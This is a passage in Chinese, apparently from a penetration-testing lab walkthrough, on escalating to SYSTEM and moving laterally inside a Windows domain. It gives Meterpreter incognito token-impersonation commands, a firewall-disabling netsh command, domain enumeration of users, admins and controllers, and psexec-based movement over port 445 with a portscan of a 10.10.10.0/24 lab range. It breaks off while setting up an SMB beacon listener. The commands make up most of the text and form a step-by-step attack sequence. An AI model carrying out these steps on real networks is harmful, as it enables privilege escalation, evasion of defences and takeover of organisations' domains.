ms14-058 提到 system 权限
也可以使用令牌窃取,提权
meterpreter > load incognito //加载incognito
meterpreter > getuid //查看当前token
meterpreter > list_tokens -u //列出可用token
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" //token窃取,格式为impersonate_token"主机名\\用户名"
meterpreter > getuid //查看当前token
meterpreter > rev2self //返回之前的token
windows平台下的incognito.exe操作与此类似。
3.3 域信息收集ipconfig /all,发现机器有双网卡,内网 10.10.10.1/24 网段,域控 ip 10.10.10.10 (域控一般是本机的DNS服务器)
运行portscan模块,扫描内网
查看域名 net config workstation
关闭防火墙 netsh advfirewall set allprofiles state off
查看有几个域 net view /domain
查看域内主机 nei view
查询域内用户 net user /domain #该命令在本环境中需要在system权限下执行
查看域管理员 net group "domain admins" /domain
查看域控 net group "domain controllers" /domain
psexec 是微软 pstools 工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。psexec 能够在命令行下在对方没有开启 telnet 服务的时候返回一个半交互的命令行,像 telnet 客户端一样。原理是基于IPC共享,所以要目标打开 445 端口。另外在启动这个 psexec 建立连接之后对方机器上会被安装一个服务。
获取凭据后对目标网段进行端口存活探测,因为是 psexec 传递登录,这里仅需探测445端口
命令:portscan ip网段 端口 扫描协议(arp、icmp、none) 线程
例如:portscan 10.10.10.0/24 445 arp 200
可看到域控机器DC开放了445端口
工具栏 View->Targets 查看端口探测后的存活主机
新建一个 Listener,Payload 选择 windows/beacon_smb/bind_pipe